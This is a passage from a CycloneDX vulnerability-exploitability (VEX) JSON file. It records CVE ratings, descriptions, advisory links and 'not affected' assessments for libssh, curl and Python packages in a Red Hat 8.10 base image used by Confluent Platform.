          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3731",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        119,
        125
      ],
      "description": "A weakness has been identified in libssh up to 0.11.3. The impacted element is the function sftp_extensions_get_name/sftp_extensions_get_data of the file src/sftp.c of the component SFTP Extension Name Handler. Executing a manipulation of the argument idx can lead to out-of-bounds read. The attack may be performed from remote. Upgrading to version 0.11.4 and 0.12.0 is sufficient to resolve this issue. This patch is called 855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60. You should upgrade the affected component.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3731"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3731"
        },
        {
          "url": "https://gitlab.com/libssh/libssh-mirror/-/commit/855a0853ad3abd4a6cd85ce06fce6d8d4c7a0b60"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3731"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8093-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8093-2"
        },
        {
          "url": "https://vuldb.com/?ctiid.349709"
        },
        {
          "url": "https://vuldb.com/?id.349709"
        },
        {
          "url": "https://vuldb.com/?submit.767120"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3731"
        },
        {
          "url": "https://www.libssh.org/files/0.12/libssh-0.12.0.tar.xz"
        },
        {
          "url": "https://www.libssh.org/security/advisories/libssh-2026-sftp-extensions.txt"
        }
      ],
      "published": "2026-03-08T11:15:50+00:00",
      "updated": "2026-06-17T10:44:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3783",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a redirect to a second URL, curl could leak that token to the second\nhostname under some circumstances.\n\nIf the hostname that the first request is redirected to has information in the\nused .netrc file, with either of the `machine` or `default` keywords, curl\nwould pass on the bearer token set for the first host also to the second one.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3783"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3783"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-8whr-249c-vfjp"
        },
        {
          "url": "https://hackerone.com/reports/3583983"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3783.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3783"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3783"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3784",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        305
      ],
      "description": "curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a\nserver, even if the new request uses different credentials for the HTTP proxy.\nThe proper behavior is to create or use a separate connection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3784"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3784"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5q3w-6p3j-mw6p"
        },
        {
          "url": "https://hackerone.com/reports/3584903"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3784.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3784"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3784"
        }
